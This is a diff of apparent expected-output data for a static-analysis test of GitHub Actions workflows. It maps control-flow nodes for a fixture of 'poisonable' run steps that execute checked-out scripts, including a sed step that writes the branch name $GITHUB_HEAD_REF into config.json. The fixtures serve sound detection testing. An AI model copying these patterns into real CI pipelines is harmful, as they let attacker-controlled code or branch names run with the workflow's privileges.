.github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| 
.github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| 
.github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | 
.github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | 
.github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| 
.github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css 
| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | 
.github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | 
.github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo 
"bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:41:23 | 
Job: local_commands | | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | 
.github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: 
local_commands | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | 
.github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -665,11 +672,11 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | enter on: push | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | exit on: push (normal) | -| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
